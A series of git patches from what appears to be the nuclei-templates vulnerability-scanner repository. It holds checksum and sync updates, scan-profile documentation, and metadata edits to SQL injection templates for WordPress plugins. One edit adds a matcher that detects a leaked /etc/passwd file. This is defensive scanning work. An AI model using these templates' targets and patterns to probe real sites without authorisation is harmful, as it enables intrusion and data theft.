javascript/enumeration/mysql/mysql-default-login.yaml:6b496745946bfc4fbb85cba1c438a9825d3b9450 javascript/enumeration/mysql/mysql-info.yaml:5ceb2e000a061946387f2c789f0f8c8088b2ca3e javascript/enumeration/mysql/mysql-show-databases.yaml:1d696acf5bb7da5b077fea32f568e4875e129575 @@ -8603,7 +8604,7 @@ network/cves/2022/CVE-2022-24706.yaml:977a6263c91851c548388120854b62e51fce8132 network/cves/2022/CVE-2022-31793.yaml:2db38ef9772fbdbc847e78407b959113ed41f359 network/cves/2023/CVE-2023-33246.yaml:bd0b0fbc109f252476a8872e4e7e6e552d1b01e9 network/default-login/ftp-anonymous-login.yaml:f08d36de58b3fa0aaad6faa31876e88adcca98f7 -network/default-login/ftp-weak-credentials.yaml:2893a5e523bf1853feeff9cf0f9ba74c1965bb59 +network/default-login/ftp-weak-credentials.yaml:72c7c5f028520212bbe7b6e3afc9083f14ce8d42 network/default-login/ldap-anonymous-login.yaml:a3dcae7c312b0f4f71b307a77bff88492af4ddf4 network/detection/activemq-openwire-transport-detect.yaml:40c2853cd0ddbe1e8aebd1f2d225df2ba327f3ac network/detection/aix-websm-detect.yaml:a3e9c8c897aab85eb396c9750ce3a2287599138a @@ -8727,7 +8728,7 @@ profiles/default-login.yml:f10a424c61d9a1d411229bc2e35f2bdb2650bedf profiles/kev.yml:f4fadde36adee86e24778fd0bd00fbcb49a30a4b profiles/misconfigurations.yml:586c1e221434a7afe5295c6e45473cab80632b2d profiles/osint.yml:e2c01c742d5d7bf7ac3599a7c29afdb5dd1c6d90 -profiles/pentest.yml:e3a9ebe543e9c2d046ead1efc292394b54a55196 +profiles/pentest.yml:01b7a6a5772a05c0ff3ec78c096dfa4ddc14579e profiles/privilege-escalation.yml:325607b721fcea55111f8698b10951fd2f0d17b8 profiles/recommended.yml:fab406df5589469085f68aadf07cba513a2a20b8 profiles/subdomain-takeovers.yml:71a2e501c22e3032df9efa362c8062716b725831 @@ -8761,7 +8762,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:4969e6d6ee33f3abd83bbd608bb8181bc3154705 +templates-checksum.txt:c7a34bb42b15a4fd0d45f3cb4e218bf20cbee260 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 2d89d3060530ea3c29affd8f849a439eef61165c Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Tue, 25 Jun 2024 07:46:40 +0000 Subject: [PATCH 0573/1841] Syncing Templates --- .github/workflows/templates-sync.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index 0c51569872..af45ef53ce 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -74,6 +74,7 @@ on: - 'http/cves/2021/CVE-2021-38146.yaml' - 'http/cves/2021/CVE-2021-38147.yaml' - 'http/cves/2021/CVE-2021-43831.yaml' + - 'http/cves/2021/CVE-2021-4436.yaml' - 'http/cves/2023/CVE-2023-32068.yaml' - 'http/cves/2023/CVE-2023-37645.yaml' - 'http/cves/2023/CVE-2023-38194.yaml' From 975da352a2e802a73dd7c2c05e4cb0a03fe7aec2 Mon Sep 17 00:00:00 2001 From: Parth Malhotra <28601533+parthmalhotra@users.noreply.github.com> Date: Tue, 25 Jun 2024 13:17:35 +0530 Subject: [PATCH 0574/1841] Update privilege-escalation.yml --- profiles/privilege-escalation.yml | 17 +++++++++++++++++ 1 file changed, 17 insertions(+) diff --git a/profiles/privilege-escalation.yml b/profiles/privilege-escalation.yml index 85c0614d28..0f9b47dfb2 100644 --- a/profiles/privilege-escalation.yml +++ b/profiles/privilege-escalation.yml @@ -1,3 +1,20 @@ +# Nuclei Configuration Profile for Local Privilege Escalation Vulnerabilities +# +# This configuration file is specifically tailored for detecting local privilege escalation vulnerabilities using Nuclei. +# +# Purpose: +# This profile is focused on identifying vulnerabilities that can lead to local privilege escalation and local security issues. It includes code templates to enhance detection capabilities and targets specific scenarios where local vulnerabilities can be exploited for gaining higher privileges. +# +# Included Templates: +# This configuration references specific templates tagged with 'privesc' and 'local' to cover comprehensive detection of local privilege escalation vulnerabilities: +# +# Configuration: +# The profile includes code templates to check for local privilege escalation vulnerabilities. +# +# Running this profile +# You can run this profile using the following command: +# nuclei -profile privilege-escalation + code: true tags: From 351285f552a66215b56decae4894896f0a62acf2 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 25 Jun 2024 07:47:37 +0000 Subject: [PATCH 0575/1841] Auto Template Signing [Tue Jun 25 07:47:37 UTC 2024] :robot: --- http/cves/2021/CVE-2021-4436.yaml | 1 + http/exposed-panels/ibm/ibm-advanced-system-management.yaml | 1 + network/default-login/ftp-weak-credentials.yaml | 2 +- 3 files changed, 3 insertions(+), 1 deletion(-) diff --git a/http/cves/2021/CVE-2021-4436.yaml b/http/cves/2021/CVE-2021-4436.yaml index ab6349dde8..531f68b8af 100644 --- a/http/cves/2021/CVE-2021-4436.yaml +++ b/http/cves/2021/CVE-2021-4436.yaml @@ -63,3 +63,4 @@ http: - type: status status: - 200 +# digest: 4a0a004730450220505cc213149b2b7ea3611ef5cd0bf0c1d786d34503427cfdbd6ccc0844710e430221008083729a34767882c976fc061ae7a9a6db2061f3de0036ea1c4da8ec263724cf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/ibm/ibm-advanced-system-management.yaml b/http/exposed-panels/ibm/ibm-advanced-system-management.yaml index 6d575f9b17..461d311c99 100644 --- a/http/exposed-panels/ibm/ibm-advanced-system-management.yaml +++ b/http/exposed-panels/ibm/ibm-advanced-system-management.yaml @@ -41,3 +41,4 @@ http: group: 1 regex: - '(?i)Update\s+Access\s+Key\s+Exp\s+Date\s+\(YYYY-MM-DD\):\s+([0-9\-]+)' +# digest: 4a0a00473045022100e9cb62a771e8b58d67c520cbada07b12a5148daa29798dfd91256f40a305ec75022061615bd57db93d590a8d892ed717cb38910db871aa0af4627ec38ac6b9ba07c7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/network/default-login/ftp-weak-credentials.yaml b/network/default-login/ftp-weak-credentials.yaml index 5c5200f76b..1d58ec7083 100644 --- a/network/default-login/ftp-weak-credentials.yaml +++ b/network/default-login/ftp-weak-credentials.yaml @@ -41,4 +41,4 @@ tcp: - type: word words: - "230 Login successful" -# digest: 4b0a00483046022100b8c4998141db4b0181cfe13c0eaad66c593bc694fb3d398760834ee54db4545e022100fe78e0c06ffbcd380f02d3a9082c74732906f19a713d62d366406ad42217577c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402201b55c63c722237b317274aee45ae2a3ed61cc6e6d4af9185bbec5aae7910235e022065638009ee860b3916f08c1938165d77cda4358d3db0878cad443ec65c4a0a7d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 9e7ef89fe22684393da07c3d9fdb0bc752026c59 Mon Sep 17 00:00:00 2001 From: Parth Malhotra <28601533+parthmalhotra@users.noreply.github.com> Date: Tue, 25 Jun 2024 13:18:14 +0530 Subject: [PATCH 0576/1841] Update aws-cloud-config.yml --- profiles/aws-cloud-config.yml | 3 +-- 1 file changed, 1 insertion(+), 2 deletions(-) diff --git a/profiles/aws-cloud-config.yml b/profiles/aws-cloud-config.yml index e434125e87..d989770368 100644 --- a/profiles/aws-cloud-config.yml +++ b/profiles/aws-cloud-config.yml @@ -14,8 +14,7 @@ # # Running this profile # You can run this profile using the following command: -# nuclei -profile aws-acls -u https://example.com - +# nuclei -profile aws-acls code: true # enable code templates tags: From cc3d802a65192c297fe7420d30dfd8fab5440a8a Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Tue, 25 Jun 2024 13:20:48 +0530 Subject: [PATCH 0577/1841] Update CVE-2024-36527.yaml --- http/cves/2024/CVE-2024-36527.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/http/cves/2024/CVE-2024-36527.yaml b/http/cves/2024/CVE-2024-36527.yaml index 6840715a7f..0bd39d6ad5 100644 --- a/http/cves/2024/CVE-2024-36527.yaml +++ b/http/cves/2024/CVE-2024-36527.yaml @@ -26,6 +26,7 @@ http: matchers-condition: and matchers: - type: regex + part: body regex: - "root:.*:0:0:" From 4f4d2f08f51d6b86d149eab86d1b592c3dcd84e8 Mon Sep 17 00:00:00 2001 From: Parth Malhotra <28601533+parthmalhotra@users.noreply.github.com> Date: Tue, 25 Jun 2024 13:21:02 +0530 Subject: [PATCH 0578/1841] Update recommended.yml --- profiles/recommended.yml | 93 +++++++++++++++++++++++++++++++++++++--- 1 file changed, 87 insertions(+), 6 deletions(-) diff --git a/profiles/recommended.yml b/profiles/recommended.yml index 910982340f..ea564d077a 100644 --- a/profiles/recommended.yml +++ b/profiles/recommended.yml @@ -1,9 +1,90 @@ -# This is a configuration file for the recommended template profile. -# Additional configuration profiles can be created for different types of nuclei scans. -# They should be placed under the 'config' directory at: -# https://github.com/projectdiscovery/nuclei-templates -# Here is an example of how to use a config profile: -# nuclei -config config/recommended.yml -list target_list_to_scan.txt +# Nuclei Configuration Profile for Recommended Detection +# +# This configuration file is specifically tailored for performing recommended scans using Nuclei. +# +# Purpose: +# This profile is focused on identifying a wide range of security vulnerabilities across various protocols and services. It includes templates with different severity levels and excludes certain tags and template IDs to provide a balanced and focused detection approach. +# +# Included Templates: +# This configuration references specific templates designed for comprehensive security scanning: +# - severity: Templates with critical, high, medium, low, and unknown severity levels. +# - type: Templates for detecting vulnerabilities in HTTP, TCP, and templates written in javascript protocol. +# +# Excluded Tags: +# This configuration excludes templates tagged with the following to avoid unnecessary and potentially disruptive tests: +# - tech +# - dos +# - fuzz +# - creds-stuffing +# - token-spray +# - osint +# +# Excluded IDs: +# This configuration excludes specific template IDs to further refine the detection scope: +# - CVE-2021-45967 +# - CVE-2021-36380 +# - CVE-2021-33544 +# - CVE-2021-32305 +# - CVE-2021-31755 +# - CVE-2021-28164 +# - CVE-2021-27931 +# - CVE-2021-26855 +# - CVE-2021-25052 +# - CVE-2021-1498 +# - CVE-2020-7796 +# - CVE-2020-5775 +# - CVE-2020-35713 +# - CVE-2020-26919 +# - CVE-2020-25223 +# - CVE-2020-24148 +# - CVE-2020-10770 +# - CVE-2019-9978 +# - CVE-2019-8451 +# - CVE-2019-3929 +# - CVE-2019-2767 +# - CVE-2019-2616 +# - CVE-2019-20224 +# - CVE-2019-19824 +# - CVE-2019-10758 +# - CVE-2018-16167 +# - CVE-2018-15517 +# - CVE-2018-1000600 +# - CVE-2017-9506 +# - CVE-2017-3506 +# - CVE-2017-18638 +# - CVE-2016-1555 +# - CVE-2015-8813 +# - CVE-2014-3206 +# - CVE-2009-4223 +# - CNVD-2021-09650 +# - generic-tokens +# - credentials-disclosure +# - targa-camera-ssrf +# - cloudflare-external-image-resize +# - linkerd-ssrf-detection +# - ssrf-via-oauth-misconfig +# - tls-sni-proxy +# - xmlrpc-pingback-ssrf +# - hashicorp-consul-rce +# - mirai-unknown-rce +# - optilink-ont1gew-gpon-rce +# - sar2html-rce +# - zimbra-preauth-ssrf +# - wp-xmlrpc-pingback-detection +# - fastjson-1-2-41-rce +# - fastjson-1-2-42-rce +# - fastjson-1-2-43-rce +# - fastjson-1-2-62-rce +# - fastjson-1-2-67-rce +# - fastjson-1-2-68-rce +# - request-based-interaction +# - open-proxy-internal +# - open-proxy-localhost +# - open-proxy-portscan +# +# Running this profile +# You can run this profile using the following command: +# nuclei -profile recommended -u https://example.com severity: - critical From db61f8a095d7b8a2111fd5c178763cd5a8cde78e Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Tue, 25 Jun 2024 13:21:11 +0530 Subject: [PATCH 0579/1841] updated info --- http/cves/2024/CVE-2024-3922.yaml | 11 ++++++----- 1 file changed, 6 insertions(+), 5 deletions(-) diff --git a/http/cves/2024/CVE-2024-3922.yaml b/http/cves/2024/CVE-2024-3922.yaml index 1b902ca27b..b0552b2350 100644 --- a/http/cves/2024/CVE-2024-3922.yaml +++ b/http/cves/2024/CVE-2024-3922.yaml @@ -1,22 +1,23 @@ id: CVE-2024-3922 info: - name: Dokan Pro <= 3.10.3 - Unauthenticated SQL Injection + name: Dokan Pro <= 3.10.3 - SQL Injection author: securityforeveryone severity: critical description: | The Dokan Pro plugin for WordPress is vulnerable to SQL Injection via the 'code' parameter in all versions up to, and including, 3.10.3 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. impact: | Unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. - remediation: Fixed in 3.11.0 + remediation: | + Fixed in 3.11.0 reference: - - https://nvd.nist.gov/vuln/detail/CVE-2024-3922 - https://dokan.co/docs/wordpress/changelog/ + - https://nvd.nist.gov/vuln/detail/CVE-2024-3922 metadata: verified: true - max-request: 1 + max-request: 2 publicwww-query: "/wp-content/plugins/dokan-pro/" - tags: cve,cve2024,dokan,wp-plugin,wordpress,wp,dokan-pro + tags: cve,cve2024,dokan,wp-plugin,wordpress,wp,dokan-pro,sqli flow: http(1) && http(2) From 05ae26d16b94fa0cc67275cd83d2374662649c5b Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Tue, 25 Jun 2024 07:54:39 +0000 Subject: [PATCH 0580/1841] Auto Generated New Template Addition List [Tue Jun 25 07:54:39 UTC 2024] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index ad9a846eff..7b9826351a 100644 --- a/.new-additions +++ b/.new-additions @@ -104,6 +104,7 @@ http/cves/2024/CVE-2024-3552.yaml http/cves/2024/CVE-2024-36412.yaml http/cves/2024/CVE-2024-36837.yaml http/cves/2024/CVE-2024-37393.yaml +http/cves/2024/CVE-2024-3922.yaml http/default-logins/mantisbt/mantisbt-anonymous-login.yaml http/exposed-panels/lorex-panel.yaml http/exposed-panels/oracle-application-server-panel.yaml From 7e8477ddc608bcce5d17ce4f7ea8bad2a61bff5a Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 25 Jun 2024 07:54:44 +0000 Subject: [PATCH 0581/1841] Auto Generated Templates Checksum [Tue Jun 25 07:54:44 UTC 2024] :robot: --- templates-checksum.txt | 15 ++++++++------- 1 file changed, 8 insertions(+), 7 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index d862a60def..2cc1b5587d 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -2444,7 +2444,7 @@ http/cves/2021/CVE-2021-44138.yaml:a802f5e3f53e4f8211dfd348b2ca5ddcb9304732 http/cves/2021/CVE-2021-44139.yaml:740e49a49ce3c88b450eabd43ae798ffcacf8a0e http/cves/2021/CVE-2021-44152.yaml:1930aeb138e46dbadc2969661cf98871caf3a9ac http/cves/2021/CVE-2021-44228.yaml:8874a4c3724b6c1c3ea43e62fbb9ecdca5d3772f -http/cves/2021/CVE-2021-4436.yaml:74ce19dfd388d2ab37902fbbf4e149d1bde2734f +http/cves/2021/CVE-2021-4436.yaml:ac35e5ec33d9ac13aee6ffafa84fb61f9deadfc0 http/cves/2021/CVE-2021-44427.yaml:2c4dacfc13a61ca0565e786199ea8ddff21bf839 http/cves/2021/CVE-2021-44451.yaml:3c62b0760c7c5a67589eb5a97b8b058f1c5a534f http/cves/2021/CVE-2021-44515.yaml:e4737487534b10d29b6f7d59ce84d88792faa3a0 @@ -3427,6 +3427,7 @@ http/cves/2024/CVE-2024-36412.yaml:3dab338da4cd060aacc90a2c21159bf56c95bdff http/cves/2024/CVE-2024-36837.yaml:65450880230a57a47c4dbf8b268af022ab009189 http/cves/2024/CVE-2024-37393.yaml:c7cac02b06ca12c407122ea2fff033456006d7dd http/cves/2024/CVE-2024-3822.yaml:2dd9c56b09c0619afb49b80cbcb5979b3eae5a1c +http/cves/2024/CVE-2024-3922.yaml:dde82d906c5740d50ffe462fd312c72dc9c93c0d http/cves/2024/CVE-2024-4040.yaml:87622a19f81053e7b7bfdf1fdce706db759cc310 http/cves/2024/CVE-2024-4348.yaml:4b01ceded94fa6f15d3037f21c83953c37fef181 http/cves/2024/CVE-2024-4358.yaml:9c130ef94d82e026679e80b4fcd1d544991528e8 @@ -4054,7 +4055,7 @@ http/exposed-panels/hybris-administration-console.yaml:8d1adf2e6db0850a4ade10c81 http/exposed-panels/hydra-dashboard.yaml:747dde0b956be869e2996cbf705992dd962f486f http/exposed-panels/hypertest-dashboard.yaml:8a170a6a223250686c8ca1df2499770c448f1f8e http/exposed-panels/i-mscp-panel.yaml:049d48ab1b7614f1e5b08017b97fa60bce0f3a52 -http/exposed-panels/ibm/ibm-advanced-system-management.yaml:7bd36cf919da248d98e1b8ce7d87cbe83243f502 +http/exposed-panels/ibm/ibm-advanced-system-management.yaml:e4d7159fd67b986bc83628cb8723eab9bd133c6f http/exposed-panels/ibm/ibm-dcec-panel.yaml:85de4a0aac53b7dd180b06e04f837e737a769639 http/exposed-panels/ibm/ibm-decision-server-console.yaml:9bc550d72018a4bb6fd09c5466136ddfb003891e http/exposed-panels/ibm/ibm-maximo-login.yaml:5dce11ac4ba10a7c2b8193a6b5f9879740475f79 @@ -8604,7 +8605,7 @@ network/cves/2022/CVE-2022-24706.yaml:977a6263c91851c548388120854b62e51fce8132 network/cves/2022/CVE-2022-31793.yaml:2db38ef9772fbdbc847e78407b959113ed41f359 network/cves/2023/CVE-2023-33246.yaml:bd0b0fbc109f252476a8872e4e7e6e552d1b01e9 network/default-login/ftp-anonymous-login.yaml:f08d36de58b3fa0aaad6faa31876e88adcca98f7 -network/default-login/ftp-weak-credentials.yaml:72c7c5f028520212bbe7b6e3afc9083f14ce8d42 +network/default-login/ftp-weak-credentials.yaml:6706b4c1e7c6209ba1e25289fc1286ea4a85484a network/default-login/ldap-anonymous-login.yaml:a3dcae7c312b0f4f71b307a77bff88492af4ddf4 network/detection/activemq-openwire-transport-detect.yaml:40c2853cd0ddbe1e8aebd1f2d225df2ba327f3ac network/detection/aix-websm-detect.yaml:a3e9c8c897aab85eb396c9750ce3a2287599138a @@ -8720,7 +8721,7 @@ network/vulnerabilities/clockwatch-enterprise-rce.yaml:1174218309884e2cc7b11eb46 passive/cves/2024/CVE-2024-25723.yaml:7eb36ba743582e6c04a324131d789035b7e6d72c profiles/README.md:84e7479141844434737d87eea1ab678c04d11c33 profiles/all.yml:ad3168415c8c0feaf46c6425a78546b98c3db879 -profiles/aws-cloud-config.yml:703776ad65e5371e9edc50829b733fef84feb47a +profiles/aws-cloud-config.yml:5c794783b4dd14d07c64df29da4d9d4981af49e4 profiles/cloud.yml:3133844636ed8272a455c69b86bb7b6bc6f02af7 profiles/compliance.yml:2a4e9c29796e498b4a9129572bd57f8652fe2c0c profiles/cves.yml:2c2976ffcead9f014a5933dd6718f4e7ef4a74c2 @@ -8729,8 +8730,8 @@ profiles/kev.yml:f4fadde36adee86e24778fd0bd00fbcb49a30a4b profiles/misconfigurations.yml:586c1e221434a7afe5295c6e45473cab80632b2d profiles/osint.yml:e2c01c742d5d7bf7ac3599a7c29afdb5dd1c6d90 profiles/pentest.yml:01b7a6a5772a05c0ff3ec78c096dfa4ddc14579e -profiles/privilege-escalation.yml:325607b721fcea55111f8698b10951fd2f0d17b8 -profiles/recommended.yml:fab406df5589469085f68aadf07cba513a2a20b8 +profiles/privilege-escalation.yml:49544205561ba8a6e7754e3cc92d34f82d69be61 +profiles/recommended.yml:1bca45c493a386d8683b5681baa8fdb10bed19c1 profiles/subdomain-takeovers.yml:71a2e501c22e3032df9efa362c8062716b725831 profiles/wordpress.yml:1ba00c9d00e50671e20f22bd6ec414246af67d06 ssl/c2/asyncrat-c2.yaml:6c9515a71fd5ffb28accde9bf1b379fdd366a2fa @@ -8762,7 +8763,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:c7a34bb42b15a4fd0d45f3cb4e218bf20cbee260 +templates-checksum.txt:c709dd293b9e3e60d68bf7a91c8ecd963c8ff02d wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From ec48a37fa8dc2755d3c6402079e45192290362e9 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Tue, 25 Jun 2024 07:55:41 +0000 Subject: [PATCH 0582/1841] Syncing Templates --- .github/workflows/templates-sync.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index af45ef53ce..06627c79cf 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -109,6 +109,7 @@ on: - 'http/cves/2024/CVE-2024-36412.yaml' - 'http/cves/2024/CVE-2024-36837.yaml' - 'http/cves/2024/CVE-2024-37393.yaml' + - 'http/cves/2024/CVE-2024-3922.yaml' - 'http/default-logins/mantisbt/mantisbt-anonymous-login.yaml' - 'http/exposed-panels/lorex-panel.yaml' - 'http/exposed-panels/oracle-application-server-panel.yaml' From 61f610fe1e4c4009f3b988e4b466f2a5bad8083b Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Tue, 25 Jun 2024 13:26:19 +0530 Subject: [PATCH 0583/1841] removed flow --- http/cves/2024/CVE-2024-4443.yaml | 22 +++++----------------- 1 file changed, 5 insertions(+), 17 deletions(-) diff --git a/http/cves/2024/CVE-2024-4443.yaml b/http/cves/2024/CVE-2024-4443.yaml index feabf68b93..adea03549f 100644 --- a/http/cves/2024/CVE-2024-4443.yaml +++ b/http/cves/2024/CVE-2024-4443.yaml @@ -1,19 +1,20 @@ id: CVE-2024-4443 info: - name: Business Directory Plugin – Easy Listing Directories for WordPress <= 6.4.2 - Unauthenticated SQL Injection via listingfields Parameter + name: Business Directory Plugin <= 6.4.2 - SQL Injection author: securityforeveryone severity: critical description: | The Business Directory Plugin Easy Listing Directories for WordPress plugin for WordPress is vulnerable to time-based SQL Injection via the ‘listingfields’ parameter in all versions up to, and including, 6.4.2 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. impact: | Unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. - remediation: Fixed in 6.4.3. + remediation: | + Fixed in 6.4.3. reference: - - https://nvd.nist.gov/vuln/detail/CVE-2024-4443 - https://plugins.trac.wordpress.org/browser/business-directory-plugin/trunk/includes/fields/class-fieldtypes-select.php#L110 - https://plugins.trac.wordpress.org/changeset/3089626/ - https://www.wordfence.com/threat-intel/vulnerabilities/id/982fb304-08d6-4195-97a3-f18e94295492?source=cve + - https://nvd.nist.gov/vuln/detail/CVE-2024-4443 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 @@ -22,24 +23,11 @@ info: epss-percentile: 0.27036 metadata: verified: true - max-request: 2 + max-request: 1 publicwww-query: "/wp-content/plugins/business-directory-plugin/" tags: cve,cve2024,sqli,business-directory,wordpress,wp-plugin -flow: http(1) && http(2) - http: - - raw: - - | - GET /wp-content/plugins/business-directory-plugin/README.TXT HTTP/1.1 - Host: {{Hostname}} - - matchers: - - type: word - words: - - 'Business Directory Plugin' - internal: true - - raw: - | @timeout: 20s From 325d7c7217bc4705a9faa4c0c994085d287164c4 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 25 Jun 2024 07:56:29 +0000 Subject: [PATCH 0584/1841] Auto Template Signing [Tue Jun 25 07:56:29 UTC 2024] :robot: --- http/cves/2024/CVE-2024-3922.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/http/cves/2024/CVE-2024-3922.yaml b/http/cves/2024/CVE-2024-3922.yaml index b0552b2350..d5536e34d0 100644 --- a/http/cves/2024/CVE-2024-3922.yaml +++ b/http/cves/2024/CVE-2024-3922.yaml @@ -47,3 +47,4 @@ http: - 'duration>=6' - 'status_code == 302' condition: and +# digest: 4a0a00473045022100dddd0ec4841ea543e8407a98030b788b48c7c9ed9dd3effa76716f9339223b8a022076cb03daa28b52dab09d0014ed45363b0db7d14951be1ec39218c42cc49ee34f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 62f99da9468191b9cae6d299fbeafe8baa285f91 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Tue, 25 Jun 2024 07:59:55 +0000 Subject: [PATCH 0585/1841] Auto Generated New Template Addition List [Tue Jun 25 07:59:55 UTC 2024] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 7b9826351a..7c1714e737 100644 --- a/.new-additions +++ b/.new-additions @@ -105,6 +105,7 @@ http/cves/2024/CVE-2024-36412.yaml http/cves/2024/CVE-2024-36837.yaml http/cves/2024/CVE-2024-37393.yaml http/cves/2024/CVE-2024-3922.yaml +http/cves/2024/CVE-2024-4443.yaml http/default-logins/mantisbt/mantisbt-anonymous-login.yaml http/exposed-panels/lorex-panel.yaml http/exposed-panels/oracle-application-server-panel.yaml From 973c3bca6a527bcbbb07d87a21cec8b3b8ec41e3 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 25 Jun 2024 08:00:01 +0000 Subject: [PATCH 0586/1841] Auto Generated Templates Checksum [Tue Jun 25 08:00:01 UTC 2024] :robot: --- templates-checksum.txt | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 2cc1b5587d..5ac98eba62 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -3427,10 +3427,11 @@ http/cves/2024/CVE-2024-36412.yaml:3dab338da4cd060aacc90a2c21159bf56c95bdff http/cves/2024/CVE-2024-36837.yaml:65450880230a57a47c4dbf8b268af022ab009189 http/cves/2024/CVE-2024-37393.yaml:c7cac02b06ca12c407122ea2fff033456006d7dd http/cves/2024/CVE-2024-3822.yaml:2dd9c56b09c0619afb49b80cbcb5979b3eae5a1c -http/cves/2024/CVE-2024-3922.yaml:dde82d906c5740d50ffe462fd312c72dc9c93c0d +http/cves/2024/CVE-2024-3922.yaml:768a5cb24e6893fee27193eda765eeeaedae2a21 http/cves/2024/CVE-2024-4040.yaml:87622a19f81053e7b7bfdf1fdce706db759cc310 http/cves/2024/CVE-2024-4348.yaml:4b01ceded94fa6f15d3037f21c83953c37fef181 http/cves/2024/CVE-2024-4358.yaml:9c130ef94d82e026679e80b4fcd1d544991528e8 +http/cves/2024/CVE-2024-4443.yaml:0a95192b7f74a14c6328203e9dd2f22b3b61cfd6 http/cves/2024/CVE-2024-4577.yaml:c53e4d3f699e49597036f2b9e5ea8ab75e67904b http/cves/2024/CVE-2024-4956.yaml:c6be2d64ff4b985c30acc88c57c66d57a846d25a http/cves/2024/CVE-2024-5230.yaml:8b073f5f6aa9e22b66403c2c6297fb487fbade0c @@ -8763,7 +8764,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:c709dd293b9e3e60d68bf7a91c8ecd963c8ff02d +templates-checksum.txt:6dd4861736a3f1174f86a88cad5c0017aae67084 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 3498dd25e026eabccaa06114a607c6bbac922a76 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Tue, 25 Jun 2024 08:00:42 +0000 Subject: [PATCH 0587/1841] Syncing Templates --- .github/workflows/templates-sync.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index 06627c79cf..e96267dbbb 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -110,6 +110,7 @@ on: - 'http/cves/2024/CVE-2024-36837.yaml' - 'http/cves/2024/CVE-2024-37393.yaml' - 'http/cves/2024/CVE-2024-3922.yaml' + - 'http/cves/2024/CVE-2024-4443.yaml' - 'http/default-logins/mantisbt/mantisbt-anonymous-login.yaml' - 'http/exposed-panels/lorex-panel.yaml' - 'http/exposed-panels/oracle-application-server-panel.yaml' From 3ffd742a1e7d97a3e4fec7dfc5d8bf0dd0894107 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 25 Jun 2024 08:01:44 +0000 Subject: [PATCH 0588/1841] Auto Template Signing [Tue Jun 25 08:01:44 UTC 2024] :robot: --- http/cves/2024/CVE-2024-4443.yaml | 1 + 1 file changed, 